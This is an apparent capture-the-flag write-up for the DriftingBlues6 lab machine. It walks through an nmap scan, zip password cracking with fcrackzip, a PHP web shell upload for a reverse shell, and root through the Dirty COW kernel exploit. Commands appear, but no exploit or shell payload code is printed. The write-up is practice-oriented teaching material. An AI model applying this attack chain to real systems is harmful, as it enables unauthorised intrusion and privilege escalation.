sec👨‍💻fortress:~#

Defensive By Offensive!.

View on GitHub

Driftingblues6

image

Difficulty = Easy

As usual we run our network discovery scan, discovered 192.168.0.115

Running our nmap scan we discovered only one port

# Nmap 7.94 scan initiated Fri Nov 17 03:02:13 2023 as: nmap -p- -sVC -v --min-rate=1000 -T4 -oN nmap.txt 192.168.0.115
Nmap scan report for driftingblues (192.168.0.115)
Host is up (0.00028s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: driftingblues
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 17 03:02:27 2023 -- 1 IP address (1 host up) scanned in 13.82 seconds

Checking out port 80/HTTP we have this website, Nothing really 🤪

Checking out /robots.txt just as nmap as said we have this

Navigating to /textpattern/txtpattern we have this login page

As said earlier i decided to run a directory bruteforce with ffuf adding the .zip extension

We can then download the zip file directly using the command below

$ wget 192.168.0.115/spammer.zip

When we try to unzip the file, we are asked for a password

Using a tool called fcrackzip we can go ahead and bruteforce the zip file

$ sudo apt install fcrackzip
$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip

We can go ahead and unzip the archive, which gives us creds.txt

We can go ahead and login to the login page we found earlier

Navigating to the content tab and clicking Files we where able to upload a PHP web shell

Our PHP web shell was uploaded to /textpattern/files called good.php, you can find one from www.revshells.com

Hell yeah, we got reverse shell as user www-data (Hint -: Use a python payload for stable shell)

Enumerated the box, looking for users, only www-data exists, password in config files, SUID, Nothing !!! But running uname -a tells us the version of linux we are currently running on -:

Unfortunately, this version of linux is vulnerable to the Dirty cow # Race Condition Privilege Escalation exploit, this will be beneficial to us 😁

Go ahead and copy the code, then create a file name cowroot.c and save the file

Compile the code using GCC with the following command

$ gcc cowroot.c -o cowroot -pthread

Now run the code with ./cowroot and you should be user root

GG 👾